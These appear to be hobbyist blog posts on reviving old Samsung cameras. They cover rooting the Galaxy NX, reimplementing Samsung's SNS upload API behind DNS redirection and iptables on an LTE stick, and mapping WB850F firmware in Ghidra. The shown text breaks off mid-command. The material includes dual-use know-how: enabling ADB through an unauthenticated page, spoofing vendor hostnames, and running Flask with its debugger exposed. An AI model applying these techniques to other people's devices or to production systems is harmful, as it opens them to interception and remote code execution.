In 2013, Samsung released the Galaxy NX (EK-GN100, EK-GN120, internal name "Galaxy U"), half Android smartphone, half interchangeable lens camera with a 20.3MP APS-C sensor, as part of the NX lineup that I analyzed last year.
A decade later, the Galaxy NX is an expensive rarity on the used market. Luckily, I was able to obtain one of these Android+Linux-SoC hybrids, and will find out what makes it tick in this post.
Hardware Overview
The Android part can probably be called a "phablet" by 2013's standards, given its 4.8" screen and lack of a speaker / microphone. It's powered by the 1.6GHz quad-core Exynos 4412 SoC, featuring LTE connectivity and dual-band WiFi. Back then, there was no VoLTE, so the lack of audio is understandable, and anyway it might look a bit weird to hold a rather large mirrorless camera with an even larger lens to your head.
Due to the large touchscreen, there is not much space for physical camera controls. Just the mode dial, shutter and video recording buttons. Most NX lenses have an additional i-Fn button to cycle through manual camera settings.
From the outside, it's not clear how the Android SoC and the DRIMeIV camera SoC interact with each other. They seem to live in an open relationship, anyway: from time to time, the camera SoC will crash, only showing a black live view, and the Android will eventually find that out and try to restart it (without much success):
Shutting down the camera, removing the battery and restarting everything will calm the evil ghosts... for a while.
Of the 2GB of physical RAM, Android can see 1.5GB, probably meaning that the remaining 512MB are assigned to the DRIMeIV SoC, matching the NX300. We'll do the flash and firmware analysis further below.
Android 4.2 is dead
The latest (and only) Android firmware released by Samsung is Android 4.2.2 Jelly Bean from 2012. There are no official or unofficial ports of later Android releases. The UI is snappy, but the decade of age shows, despite Samsung's customizing.
The dated Android is especially painful due to three issues: lack of apps, outdated encryption, and outdated root certificates:
Issue 1: No apps compatible with Android 4.2
Keeping an app backward-compatible is work. Much work. Especially with Google moving the goalposts every year. Therefore, most developers abandon old Android versions whenever adding a new feature in a backward-compatible fashion would be non-trivial.
Therefore, we need to scrape decade-old APK files from the shady corners of the Internet.
Free & Open Source apps
Google Play is of no help here, but luckily the
F-Droid community cares about old devices.
Less luckily, the old version of F-Droid will OOM-crash under the weight of
the archive repository,
so packages have to be hunted down and installed manually with adb
after
enabling
developer settings.
I had to look up the package name for each app I was interested in, then
manually search for the latest compatible MinVer: 4.
build in the
view-source
of the respective
archive browser page:
- F-Droid: org.fdroid.fdroid, 1.12.1 (2021-04-16) APK (8MB)
- Firefox: org.mozilla.fennec_fdroid, 68.12.0 (2020-08-29) APK (53MB)
- Mastodon: org.joinmastodon.android, first version on F-Droid already requires Android 6. Bummer.
- Fedilab (Mastodon client): fr.gouv.etalab.mastodon, 2.2.0 (2019-06-03) APK (17MB)
- Tusky (Mastodon client): com.keylesspalace.tusky, 1.4.1 (2017-12-07) APK (3MB)
- yaxim: oh look, the newest release still works on 4.x! APK (3MB)
In the end, the official Mastodon client wasn't available, and the other ones were so old and buggy (and/or suffered from issues 2 and 3 below) that I went back to using the mastodon web interface from Firefox.
Proprietary Apps
As everywhere on the Internet, there is a large number of shady,
malware-pushing, SEO-optimized, easy to fall for websites that offer APK
files scraped from Google Play. Most of them will try to push their own
"installer" app to you, or even disguise their installer as the app you
try to get.
Again, knowing the internal package name helps finding the right page. Searching multiple portals might help you get the latest APK that still supports your device.
- apkmonk - scroll down to "All Versions", clicking on an individual version will start the APK download (no way to know the required Android release without trial and error).
- APKPure - don't click on "Use APKPure App", don't install the browser extension. Click on "Old versions of ..." or on "All Versions". Clicking an individual version in the table will show the required Android release.
- APKMirror - has a listing of old versions ("See more uploads..."), but only shows the actual Android release compatibility on the respective app version's page.
Issue 1b: limited RAW editing
TL;DR: Snapseed fails, but Lightroom works with some quirks on the Galaxy NX. Long version:
The Galaxy NX is a camera first, and a smartphone phablet second.
It has very decent interchangeable lenses, a 20MP sensor, and can record
RAW photos in Samsung's
SRW
format.
Snapseed: error messages galore
Given that it's also an Android device, the free
Snapseed
tool is the most obvious choice to process the RAW images. It supports the
industry standard Adobe patented openly-documented
"digital negative" DNG
format.
To convert from RAW to DNG
, there is a convenient tool named
raw2dng that supports quite a
bunch of formats, including SRW
. The latest version running on Android 4.2 is
raw2dng 2.4.2.
The app's UI is a bit cumbersome, but it will successfully convert SRW
to
DNG
on the Galaxy NX! Unfortunately, it will not add them to the Android
media index, so we also need to run
SD Scanner
after each conversion.
Yay! We have completed step 1 out of 3! Now, we only need to open the
newly-converted DNG
in Snapseed.
The latest Snapseed version still running on Android 4.2 is Snapseed 2.17.0.
That version won't register as a file handler for DNG
files, and you can't
choose them from the "Open..." dialog in Snapseed, but you can "Send to..." a
DNG
from your file manager:
Okay, so you can't. Well, but the "Open..." dialog shows each image twice, the
JPG
and the SRW
, so we probably can open the latter and do our RAW editing
anyway:
Bummer. Apparently, this feature relies on DNG
support that was only
added in Android 5.
But the error message means that it was deliberately blocked, so
let's downgrade Snapseed... The error was added in 2.3; versions 2.1 and 2.0
opened the SRW
but treated it like a JPG (no raw development, probably an
implicit conversion implemented by Samsung's firmware; you can also use raw
images with other apps, and then they run out of memory and crash). Snapseed
2.0 finally doesn't have this error message... but instead another one:
So we can't process our raw photos with Snapseed on Android 4.2. What a pity.
Lightroom: one picture a time
Luckily, there is a commercial alternative: Adobe Lightroom. The last version for our old Android is Lightroom 3.5.2.
As part of the overall
enshittification, it
will ask you all the time to login / register with your Adobe account, and
will refuse editing SRW
pictures (because they "were not created on the
device"). However, it will actually accept (and process!) DNG
files
converted with raw2dng and indexed with SD Scanner, and will allow basic
development including full resolution JPEG exports.
However, you may only ever "import" a single DNG
file at a time (it takes
roughly 3-4 seconds). If you try to import multiple files, Lightroom will hang
forever:
It will also remember the pending imports on next app start, and immediately hang up again. The only way out is from Android Settings ➡ Applications ➡ Lightroom ➡ Clear data; then import each image individually into Lightroom.
Issue 2: No TLS 1.3, deactivated TLS 1.2
In 2018, TLS 1.3 happened, and pushed many sites and their API endpoints to remove TLS 1.0 and 1.1.
However, Android's SSLSocket
poses a problem here.
Support for TLS 1.1 and 1.2 was introduced in Android 4.1, but only enabled by
default in Android 5. Apps that didn't explicitly enable it on older devices
are stuck on TLS 1.0, and are out of luck when accessing securely-configured
modern API endpoints. Given that most apps abandoned Android 4.x compatibility
before TLS 1.2 became omnipresent, the old APKs we can use won't work with
today's Internet.
There is another aspect to TLS 1.2, and that's the introduction of elliptic-curve certificates (ECDSA ciphers). Sites that switch from RSA to DSA certificates will not work if TLS 1.2 isn't explicitly enabled in the app. Now, hypothetically, you can decompile the APK, patch in TLS 1.2 support, and reassemble a self-signed app, but that would be real work.
Note: TLS 1.3 was only added (and activated) in Android 10, so we are completely out of luck with any services requiring that.
Of course, the TLS compatibility is only an issue for apps that use Android's native network stack, which is 99.99% of all apps. Firefox is one of the few exceptions as it comes with its own SSL/TLS implementation and actually supports TLS 1.0 to 1.3 on Android 4!
Issue 3: Let's Encrypt Root CA
Now even if the service you want to talk to still supports TLS 1.0 (or the respective app from back when Android 4.x was still en vogue activated TLS 1.2), there is another problem. Most websites are using the free Let's Encrypt certificates, especially for API endpoints. Luckily, Let's Encrypt identified and solved the Android compatibility problem in 2020!
All that a website operator (each website operator) needs to do is to ensure that they add the DST Root CA X3 signed ISRG Root X1 certificate in addition to the Let's Encrypt R3 certificate to their server's certificate chain! 🤯
Otherwise, their server will not be trusted by old Android:
Such a dialog will only be shown by apps which allow the user to override an "untrusted" Root CA (e.g. using the MemorizingTrustManager). Other apps will just abort with obscure error messages, saying that the server is not reachable and please-check-your-internet-connection.
Alternatively, it's possible to patch the respective app (real work!), or to add the LE Root CA to the user's certificate store. The last approach requires setting an Android-wide password or unlock pattern, because, you know, security!
The lock screen requirement can be worked around on a rooted device by adding
the certificate to the /system
partition, using apps like the Root
Certificate Manager(ROOT) (it requires root
permissions to install Root
Certificatfes to the root filesystem!), or following an easy
12-step adb-shell-bouncycastle-keytool tutorial.
Getting Root
There is a handful of Android 4.x rooting apps that use one of the many well-documented exploits to obtain temporary permissions, or to install some old version of SuperSU. All of them fail due to the aforementioned TLS issues.
In the end, the only one that worked was the
Galaxy NX (EK-GN120) Root
from XDA-Dev, which needs to be installed through Samsung's
ODIN, and
will place a su
binary and the SuperSU app on the root filesystem.
Now, ODIN is not only illegal to distribute, but also still causes PTSD
flashbacks years after the last time I used it. Luckily,
Heimdall is a FOSS replacement that
is easy and robust, and all we need to do is to extract the tar
file and
run:
heimdall flash --BOOT boot.img
On the next start, su
and SuperSu will be added to the /system
partition.
Firmware structure
This is a slightly more detailed recap of the earlier Galaxy NX firmware analysis.
Android firmware
The EK-GN120 firmware is a Matryoshka
doll of containers. It is provided as a ZIP that contains a .tar.md5
file (and a DLL?! Maybe for Odin?):
Archive: EK-GN120_DBT_1_20140606095330_hny2nlwefj.zip
Length Method Size Cmpr Date Time CRC-32 Name
-------- ------ ------- ---- ---------- ----- -------- ----
1756416082 Defl:N 1144688906 35% 2014-06-06 09:53 4efae9c7 GN120XXUAND3_GN120DBTANE1_GN120XXUAND3_HOME.tar.md5
1675776 Defl:N 797975 52% 2014-06-06 09:58 34b56b1d SS_DL.dll
-------- ------- --- -------
1758091858 1145486881 35% 2 files
The .tar.md5
is an actual tar archive with an appended MD5 checksum. They
didn't even bother with a newline:
$ tail -1 GN120XXUAND3_GN120DBTANE1_GN120XXUAND3_HOME.tar.md5
[snip garbage]056c3570e489a8a5c84d6d59da3c5dee GN120XXUAND3_GN120DBTANE1_GN120XXUAND3_HOME.tar
The tar itself contains a bunch more containers:
-rwxr-xr-x dpi/dpi 79211348 2014-04-16 13:46 camera.bin
-rw-r--r-- dpi/dpi 5507328 2014-04-16 13:49 boot.img
-rw-r--r-- dpi/dpi 6942976 2014-04-16 13:49 recovery.img
-rw-r--r-- dpi/dpi 1564016712 2014-04-16 13:48 system.img
-rwxr-xr-x dpi/dpi 52370176 2014-04-16 13:46 modem.bin
-rw-r--r-- dpi/dpi 40648912 2014-05-20 21:27 cache.img
-rw-r--r-- dpi/dpi 7704808 2014-05-20 21:27 hidden.img
These img and bin files contain different parts of the firmware and are flashed into respective partitions of the phone/camera:
camera.bin
: SLP container with five partitions for the DRIMeIV Tizen Linux SoCboot.img
: (Android) Linux kernel and initramfsrecovery.img
: Android recovery kernel and initramssystem.img
: Android (sparse) root filesystem imagemodem.bin
: a 50 MByte FAT16 image... with Qualcomm modem filescache.img
: Android cache partition imagehidden.img
: Android hidden partition image (contains a few watermark pictures andOver_the_horizon.mp3
in a folderINTERNAL_SDCARD
)
DRIMeIV firmware
The camera.bin
is 77MB and features the SLP\x00
header
known from the Samsung NX300.
It's also mentioning the internal model name as "GALAXYU":
camera.bin: GALAXYU firmware 0.01 (D20D0LAHB01) with 5 partitions
144 5523488 f68a86 ffffffff vImage
5523632 7356 ad4b0983 7fffffff D4_IPL.bin
5530988 63768 3d31ae89 65ffffff D4_PNLBL.bin
5594756 2051280 b8966d27 543fffff uImage
7646036 71565312 4c5a14bc 4321ffff platform.img
The platform.img
file contains a UBIFS root partition, and presumably vImage
is used for upgrading the DRIMeIV firmware, and uImage is the standard kernel
running on the camera SoC. The rootfs features "squeeze/sid" in
/etc/debian_version
, even though it's Tizen / Samsung Linux Platform.
There is a 500KB /usr/bin/di-galaxyu-app
that's probably responsible for
camera operation as well as for talking to the Android CPU (The NX300
di-camera-app
that actually implements the camera UI is 3.1MB).
Camera API
To actually use the camera, it needs to be exposed to the Android UI, which
talks to the Linux kernel on the Android SoC, which probably talks to the
Linux kernel on the DRIMeIV SoC, which runs di-galaxyu-app
. There is
probably some communication mechanism like SPI or I2C for configuration and
signalling, and also a shared memory area to transmit high-bandwidth data
(images and video streams).
Here we only get a brief overview of the components involved, further source reading and reverse engineering needs to be done to actually understand how the pieces fit together.
The Android side
On Android, the com.sec.android.app.camera
app is responsible for camera
handling. When it's started or switches to gallery mode, the screen briefly
goes black, indicating that maybe the UI control is handed over to the DRIMeIV
SoC?
The code for the camera app can be found in
/system/app/SamsungCamera2_GalaxyNX.apk
and
/system/app/SamsungCamera2_GalaxyNX.odex
and it needs to be
deodexed
in order to decompile the Java code.
There is an Exynos 4412 Linux source drop that also contains a
DRIMeIV video driver.
That driver references a set of resolutions going up to 20MP, which matches
the Galaxy NX sensor specs. It is exposing a Video4Linux camera, and seems to
be using SPI or I2C (based on an #ifdef
) to talk to the actual DRIMeIV
processor.
The DRIMeIV side
On the other end, the
Galaxy NX source code dump
contains the Linux kernel running on the DRIMeIV SoC, with a
drivers/i2c/si2c_drime4.c
file that registers a "Samsung Drime IV Slave I2C
Driver", which also allocates a memory region for MMIO.
The closed-source di-galaxyu-app
is referencing both SPI and I2C, and
needs to be reverse-engineered.
(*) Galaxy NX photo (C) Samsung marketing material
From 2009 to 2014, Samsung released dozens of camera models and even some camcorders with built-in WiFi and a feature to upload photos and videos to social media, using Samsung's Social Network Services (SNS). That service was discontinued in 2021, leaving the cameras disconnected.
We are bringing a reverse-engineered API implementation of the SNS to a 20$ LTE modem stick in order to email or publish our photos to Mastodon on the go.
Social Network Services (SNS) API
The SNS API is a set of HTTP endpoints consuming and returning XML-like
messages (the sent XML is malformed, and the received data is not
syntax-checked by the strstr()
based parser). It is used by
all Samsung WiFi cameras created between 2011 and 2014,
and allows to proxy-upload photos and
videos to a series of social media services (Facebook, Picasa, Flickr,
YouTube, ...).
It is built on plain-text HTTP, and uses either OAuth or a broken, hand-rolled encryption scheme to "protect" the user's social media credentials.
As the original servers have been shutdown, the only way to re-create the API is to reverse engineer the client code located in various cameras' firmware (NX300, WB850F, HMX-QF30) and old packet traces.
Luckily, the lack of HTTPS and the vulnerable encryption mean that we can easily redirect the camera's traffic to our re-implementation API. On the other hand, we do not want to force the user to send their credentials over the insecure channel, and therefore will store them in the API bridge instead.
The re-implementation is written in Python on top of Flask, and needs to work around a few protocol-violating bugs on the camera side.
Deployment
The SNS bridge needs to be reachable by the camera, and we need to DNS-redirect the original Samsung API hostnames to it. It can be hosted on a free VPS, but then we still need to do the DNS trickery on the WiFi side.
When on the go, you also need to have a mobile-backed WiFi hotspot. Unfortunately, redirecting DNS for individual hostnames on stock Android is hard, you can merely change the DNS server to one under your control. But then you need to add a VPN tunnel or host a public DNS resolver, and those will become DDoS reflectors very fast.
The 20$ LTE stick
Luckily, there is an exciting dongle that will give us all three features: a
configurable WiFi hotspot, an LTE uplink, and enough power to run the
samsung-nx-emailservice
right on it:
Hackable $20 modem combines LTE and PI Zero W2 power.
It also has the bonus of limiting access to the insecure SNS API to the local WiFi hotspot network.
Initial Configuration
There is an excellent step-by-step guide to install Debian that I will not repeat here.
On some devices, the original ADB-enabling trick does not work, but you can directly open the unauthenticated http://192.168.100.1/usbdebug.html page in the browser, and within a minute the stick will reboot with ADB enabled.
If you have the hardware revision UZ801 v3.x of the stick, you need to use a custom kernel + base image.
Please follow the above instructions to complete the Debian installation.
You should be logged in as root@openstick
now for the next steps.
The openstick will support adb shell
, USB RNDIS and WiFi to access it, but
for the cameras it needs to expose a WiFi hotspot. You can
create a NetworkManager-based hotspot using nmcli
or by other means as appropriate for you.
Installing samsung-nx-emailservice
We need git, Python 3 and its venv
module to get started, install the
source, and patch werkzeug to compensate for Samsung's broken client
implementation:
apt install --no-install-recommends git python3-venv virtualenv
git clone https://github.com/ge0rg/samsung-nx-emailservice
cd samsung-nx-emailservice
python3 -m venv venv
source ./venv/bin/activate
pip3 install -r requirements.txt
# the patch is for python 3.8, we have python 3.9
cd venv/lib/python3.9/
patch -p4 < ../../../flask-3.diff
cd -
python3 samsungserver.py
By default, this will open an HTTP server on port :8080 on all IP addresses of the openstick. You can verify that by connecting to http://192.168.68.1:8080/ on the USB interface. You should see this page:
We need to change the port to 80, and ideally we should not expose the service
to the LTE side of things, so we have to obtain the WiFi hotspot's IP address
using ip addr show wlan0
:
11: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 02:00:a1:61:c7:3a brd ff:ff:ff:ff:ff:ff
inet 192.168.79.1/24 brd 192.168.79.255 scope global noprefixroute wlan0
valid_lft forever preferred_lft forever
inet6 fe80::a1ff:fe61:c73a/64 scope link
valid_lft forever preferred_lft forever
Accordingly, we edit samsungserver.py
and change the code at the end of the
file to bind to 192.168.79.1 on port 80:
if __name__ == '__main__':
app.run(debug = True, host='192.168.79.1', port=80)
We need to change
config.toml
and enter our "whitelisted" sender addresses, as well as the email and
Mastodon credentials there. To obtain a Mastodon access token from your
instance, you need to
register a new application.
Automatic startup with systemd
We also create a systemd service file called samsung-nx-email.service
in
/etc/systemd/system/
so that the service will be started automatically:
[Unit]
Description=Samsung NX API
After=syslog.target network.target
[Service]
Type=simple
WorkingDirectory=/root/samsung-nx-emailservice
ExecStart=/root/samsung-nx-emailservice/venv/bin/python3 /root/samsung-nx-emailservice/samsungserver.py
Restart=on-abort
StandardOutput=journal
[Install]
WantedBy=multi-user.target
After that, we load, start, and activate it for auto-start:
systemctl daemon-reload
systemctl enable samsung-nx-email.service
systemctl start samsung-nx-email.service
Using journalctl -fu samsung-nx-email
we can verify that everything is
working:
Jul 05 10:01:38 openstick systemd[1]: Started Samsung NX API.
Jul 05 10:01:38 openstick python3[2229382]: * Serving Flask app 'samsungserver'
Jul 05 10:01:38 openstick python3[2229382]: * Debug mode: on
Jul 05 10:01:38 openstick python3[2229382]: WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
Jul 05 10:01:38 openstick python3[2229382]: * Running on http://192.168.79.1:80
Jul 05 10:01:38 openstick python3[2229382]: Press CTRL+C to quit
Jul 05 10:01:38 openstick python3[2229382]: * Restarting with stat
Jul 05 10:01:39 openstick python3[2229388]: * Debugger is active!
Jul 05 10:01:39 openstick python3[2229388]: * Debugger PIN: 123-456-789
Security warning: this is not secure!
WARNING: This is a development server. [...]
Yes, this straight-forward deployment relying on python's built-in WSGI is not meant for production, which is why we limit it to our private WiFi.
Furthermore, the API implementation is not performing authentication beyond
checking the address againts the SENDERS
variable. Given that transmissions
are in plain-text, enforcing passwords could backfire on the user.
Redirecting DNS
By default, the Samsung cameras will attempt to connect a few servers via HTTP to find out if they are on a captive portal hotspot and to interact with the social media. The full list of hosts can be found in the project README.
As we are using NetworkManager for the hotspot, and it uses
dnsmasq internally, we can
use dnsmasq's config syntax and create an additional config file
/etc/NetworkManager/dnsmasq-shared.d/00-samsung-nx.conf
that will map all
relevant addresses to the hotspot's IP address:
address=/snsgw.samsungmobile.com/192.168.79.1
address=/gld.samsungosp.com/192.168.79.1
address=/www.samsungimaging.com/192.168.79.1
address=/www.ospserver.net/192.168.79.1
address=/www.yahoo.co.kr/192.168.79.1
address=/www.msn.com/192.168.79.1
After a reboot, we should be up and running, and can connect from the camera to the WiFi hotspot to send our pictures.
Hotspot detection strikes again
The really old models (ST1000/CL65, SH100) will mis-detect a private IP for the Samsung service as a captive hotspot portal and give you this cryptic error message:
Certification is needed from the Access Point. Connection cannot be made at this time. Call ISP for further details
If you see this message, you need to trick the camera to use a non-private IP
address, which is by Samsung's standard one that doesn't begin with 192.168.
You can change the hotspot config in /etc/NetworkManager/system-connections
to use a different RFC 1918
range from 10.0.0.0/8
or 172.16.0.0/12
, or you can band-aid around
the issue by dice-rolling a random IP from those ranges that you don't need to
access (e.g. 10.23.42.99
), to return it from 00-samsung-nx.conf
and to use
iptables to redirect HTTP traffic going to
that address to the local SNS API instead:
iptables -t nat -A PREROUTING -p tcp -d 10.23.42.99 --dport 80 -j DNAT --to-destination 192.168.79.1:8080
This will prevent you from accessing 10.23.42.99 on your ISP's network via HTTP, which is probably not a huge loss.
You can persist that rule over reboots by storing it in
/etc/iptables/rules.v4
.
Demo
This is how the finished pipeline looks in practice (the whole sequence is 3 minutes, shortened and accelerated for brevity):
And here's the resulting post:
Samsung's WB850F compact camera
was the first model to combine the DRIMeIII SoC with WiFi. Together with the
EX2F it features an uncompressed firmware binary where Samsung helpfully added
a partialImage.o.map
file with a full linker dump and all symbol names into
the firmware ZIP. We are using this gift to reverse-engineer the main SoC
firmware, so that we can make it pass the WiFi hotspot detection and use
samsung-nx-emailservice.
This is a follow-up to the Samsung WiFi cameras article and part of the Samsung NX series.
WB850F_FW_210086.zip
- the outer container
The WB850F is one of the few models where Samsung still publishes firmware and support files after discontinuing the iLauncher application.
The WB850F_FW_210086.zip
archive we can get there contains quite a few files
(as identified by file
):
GPS_FW/BASEBAND_FW_Flash.mbin: data
GPS_FW/BASEBAND_FW_Ram.mbin: data
GPS_FW/Config.BIN: data
GPS_FW/flashBurner.mbin: data
FWUP: ASCII text, with CRLF line terminators
partialImage.o.map: ASCII text
WB850-FW-SR-210086.bin: data
wb850f_adj.txt: ASCII text, with CRLF line terminators
The FWUP
file just contains the string upgrade all
which is a script for
the firmware testing/automation module. The wb850f_adj.txt
file is a similar
but more complex script to upgrade the GPS firmware and delete the respective
files. Let's skip the GPS-related script and GPS_FW
folder for now.
partialImage.o.map
- the linker dump
The partialImage.o.map
is a text file with >300k lines, containing the
linker output for partialImage.o
, including a full memory map of the linked
file:
output input virtual
section section address size file
.text 00000000 01301444
.text 00000000 000001a4 sysALib.o
$a 00000000 00000000
sysInit 00000000 00000000
L$_Good_Boot 00000090 00000000
archPwrDown 00000094 00000000
...
DevHTTPResponseStart 00321a84 000002a4
DevHTTPResponseData 00321d28 00000100
DevHTTPResponseEnd 00321e28 00000170
...
.data 00000000 004ed40c
.data 00000000 00000874 sysLib.o
sysBus 00000000 00000004
sysCpu 00000004 00000004
sysBootLine 00000008 00000004
This goes on and on and on, and it's a real treasure map! Now we just need to find the island that it belongs to.
WB850-FW-SR-210086.bin
- header analysis
Looking into WB850-FW-SR-210086.bin
with binwalk
yields a long list of
file headers (HTML, PNG, JPEG, ...), a VxWorks header, quite a number of Unix
paths, but nothing that looks like partitions or filesystems.
Let's hex-dump the first kilobyte instead:
00000000: 3231 3030 3836 0006 4657 5f55 502f 4f4e 210086..FW_UP/ON
00000010: 424c 312e 6269 6e00 0000 0000 0000 0000 BL1.bin.........
00000020: 0000 0000 0000 0000 c400 0000 0008 0000 ................
00000030: 4f4e 424c 3100 0000 0000 0000 0000 0000 ONBL1...........
00000040: 0000 0000 4657 5f55 502f 4f4e 424c 322e ....FW_UP/ONBL2.
00000050: 6269 6e00 0000 0000 0000 0000 0000 0000 bin.............
00000060: 0000 0000 30b6 0000 c408 0000 4f4e 424c ....0.......ONBL
00000070: 3200 0000 0000 0000 0000 0000 0000 0000 2...............
00000080: 5b57 4238 3530 5d44 5343 5f35 4b45 595f [WB850]DSC_5KEY_
00000090: 5742 3835 3000 0000 0000 0000 0000 0000 WB850...........
000000a0: 38f4 d101 f4be 0000 4d61 696e 5f49 6d61 8.......Main_Ima
000000b0: 6765 0000 0000 0000 0000 0000 526f 6d46 ge..........RomF
000000c0: 532f 5350 4944 2e52 6f6d 0000 0000 0000 S/SPID.Rom......
000000d0: 0000 0000 0000 0000 0000 0000 00ac f402 ................
000000e0: 2cb3 d201 5265 736f 7572 6365 0000 0000 ,...Resource....
000000f0: 0000 0000 0000 0000 4657 5f55 502f 5742 ........FW_UP/WB
00000100: 3835 302e 4845 5800 0000 0000 0000 0000 850.HEX.........
00000110: 0000 0000 0000 0000 864d 0000 2c5f c704 .........M..,_..
00000120: 4f49 5300 0000 0000 0000 0000 0000 0000 OIS.............
00000130: 0000 0000 4657 5f55 502f 736b 696e 2e62 ....FW_UP/skin.b
00000140: 696e 0000 0000 0000 0000 0000 0000 0000 in..............
00000150: 0000 0000 48d0 2f02 b2ac c704 534b 494e ....H./.....SKIN
00000160: 0000 0000 0000 0000 0000 0000 0000 0000 ................
*
000003f0: 0000 0000 0000 0000 0000 0000 5041 5254 ............PART
This looks very interesting. It starts with the firmware version, 210086
,
then 0x00 0x06
, directly followed by FW_UP/ONBL1.bin
at the offset
0x008
, which very much looks like a file name. The next file name,
FW_UP/ONBL2.bin
comes at 0x044
, so this is probably a 60-byte "partition"
record:
00000008: 4657 5f55 502f 4f4e 424c 312e 6269 6e00 FW_UP/ONBL1.bin.
00000018: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000028: c400 0000 0008 0000 4f4e 424c 3100 0000 ........ONBL1...
00000038: 0000 0000 0000 0000 0000 0000 ............
After the file name, there is quite a bunch of zeroes (making up a 32-byte
zero-padded string), followed by two little-endian integers 0xc4
and
0x800
, followed by a 20-byte zero-padded string ONBL1
, which is
probably the respective partition name. After that, the next records of the
same structure follow. The integers in the second record (ONBL2
) are
0xb630
and 0x8c4
, so we can assume the first number is the length, and the
second one is the offset in the file (the offset of one record is always
offset+length of the previous one).
In total, there are six records, so the 0x00 0x06
between the version string
and the first record is probably a termination or pading byte for the firmware
version and a one-byte number of partitions.
With this knowledge, we can reconstruct the partition table as follows:
File name | size | offset | partition name |
---|---|---|---|
FW_UP/ONBL1.bin | 196 (0xc4) | 0x0000800 |
ONBL1 |
FW_UP/ONBL2.bin | 46 KB (0xb630) | 0x00008c4 |
ONBL2 |
[WB850]DSC_5KEY_WB850 | 30 MB (0x1d1f438) | 0x000bef4 |
Main_Image |
RomFS/SPID.Rom | 48 MB (0x2f4ac00) | 0x1d2b32c |
Resource |
FW_UP/WB850.HEX | 19 KB (0x4d86) | 0x4c75f2c |
OIS |
FW_UP/skin.bin | 36 MB (0x22fd048) | 0x4c7acb2 |
SKIN |
Let's write a tool to extract DRIMeIII firmware partitions, and use it!
WB850-FW-SR-210086.bin
- code and data partitions
The tool is extracting partitions based on their partition names, appending
".bin"
respectively. Running file
on the output is not very helpful:
ONBL1.bin: data
ONBL2.bin: data
Main_Image.bin: OpenPGP Secret Key
Resource.bin: MIPSEB-LE MIPS-III ECOFF executable stripped - version 0.0
OIS.bin: data
SKIN.bin: data
ONBL1
andONBL2
are probably the stages 1 and 2 of the bootloader (as confirmed by a string inMain_Image
:"BootLoader(ONBL1, ONBL2) Update Done"
).Main_Image
is the actual firmware: the OpenPGP Secret Key is a false positive,binwalk -A
reports quite a number of ARM function prologues in this file.Resource
andSKIN
are pretty large containers, maybe provided by the SoC manufacturer to "skin" the camera UI?OIS
is not really hex as claimed by its file name, but it might be the firmware for a dedicated optical image stabilizer.
Of all these, Main_Image
is the most interesting one.
Loading the code in Ghidra
The three partitions ONBL1
, ONBL2
and Main_Image
contain actual ARM code.
A typical ARM firmware will contain the
reset vector table
at address 0x0000000
(usually the beginning of flash / ROM), which is a
series of jump instructions. All three binaries however contain actual linear
code at their respective beginning, so most probably they need to be
re-mapped to some yet unknown address.
To find out how and why the camera is mis-detecting a hotspot, we need to:
- Find the right memory address to map
Main_Image
to - Load the symbol names from
partialImage.o.map
into Ghidra - Find and analyze the function that is mis-firing the hotspot login
Loading and mapping Main_Image
By default, Ghidra will assume that the binary loads to address 0x0000000
and try to analyze it this way. To get the correct memory address, we need to
find a function that accesses some known value from the binary using an
absolute address. Given that there are 77k functions, we can start with
something that's close to task #3, and search in the "Defined Strings" tab of
Ghidra for "yahoo"
:
Excellent! Ghidra identified a few strings that look like an annoyed
developer's printf debugging, probably from a function called
DevHTTPResponseStart()
, and it seems to be the function that checks whether
the camera can properly access Yahoo, Google or Samsung:
0139f574 DevHTTPResponseStart: url=%s, handle=%x, status=%d\n, headers=%s\r\n
0139f5b8 DevHTTPResponseStart: This is YAHOO check !!!\r\n
0139f5f4 DevHTTPResponseStart: THIS IS GOOGLE/YAHOO/SAMSUNG PAGE!!!! 111\n\n\n
0139f638 DevHTTPResponseStart: 301/302/307! cannot find yahoo! safapi_is_browser_framebuffer_on : %d , safapi_is_browser_authed(): %d \r\n
According to partialImage.o.map
, a function with that name actually exists
at address 0x321a84
, and Ghidra also found a function at 0x321a84
. There
are some more matching function offsets between the map and the binary, so we
can assume that the .text
addresses from the map file actually correspond
1:1 to Main_Image
! We found the right island for our map!
Here's the beginning of that function:
bool FUN_00321a84(undefined4 param_1,ushort param_2,int param_3,int param_4) {
/* snip variable declarations */
FUN_0031daec(*(DAT_00321fd4 + 0x2c),DAT_00322034,param_3,param_1,param_2,param_4);
FUN_0031daec(*(DAT_00321fd4 + 0x2c),DAT_00322038);
FUN_00326f84(0x68);
It starts with two calls to FUN_0031daec()
with different
numbers of parameters - this smells very much of printf
debugging again.
According to the memory map, it's called opd_printf()
! The first parameter
is some sort of context / destination, and the second one must be a reference
to the format string. The two DAT_
values are detected by Ghidra as 32-bit
undefined values:
DAT_00322034:
74 35 3a c1 undefined4 C13A3574h
DAT_00322038:
b8 35 3a c1 undefined4 C13A35B8h
However, the respective last three digits match the "DevHTTPResponseStart: "
debug strings encountered earlier:
0xc13a3574 - 0x0139f574 = 0xc0004000
(first format string with four parameters)0xc13a35b8 - 0x0139f5b8 = 0xc0004000
(second format strings without parameters)
From that we can reasonably conclude that Main_Image
needs to be loaded to
the memory address 0xc0004000
. This cannot be changed after the fact in
Ghidra, so we need to remove the binary from the project, re-import it, and
set the base address accordingly:
Loading function names from partialImage.o.map
Ghidra has a script to bulk-import data labels and function names from a text
table,
ImportSymbolScript.py.
It expects each line to contain three variables, separated by arbitrary
amounts of whitespace (as determined by python's string.split()
):
- symbol name
- (hexadecimal) address
- "f" for "function" or "l" for "label"
Our symbol map contains multiple sections, but we are only interested in the
functions defined in .text
(for now), which are mapped 1:1 to addresses in
Main_Image
. Besides of function names, it also contains empty lines, object
file offsets (with .text
as the label), labels (prefixed with "L$_"
) and
local symbols (prefixed with "$"
).
We need to limit our symbols to the .text
section (everything after .text
and before .debug_frame
), get rid of the empty lines and non-functions, then
add 0xc0004000
to each address so that we match up with the base address in
Ghidra. We can do this very obscurely with an awk one-liner:
awk '/^\.text /{t=1;next}/^\.debug_frame /{t=0} ; !/[$.]/ { if (t && $1) { printf "%s %x f\n", $1, (strtonum("0x"$2)+0xc0004000) } }'
Or slightly less obscurely with a much slower shell loop:
sed '1,/^\.text /d;/^\.debug_frame /,$d' | grep -v '^$' | grep -v '[.$]' | \
while read sym addr f ; do
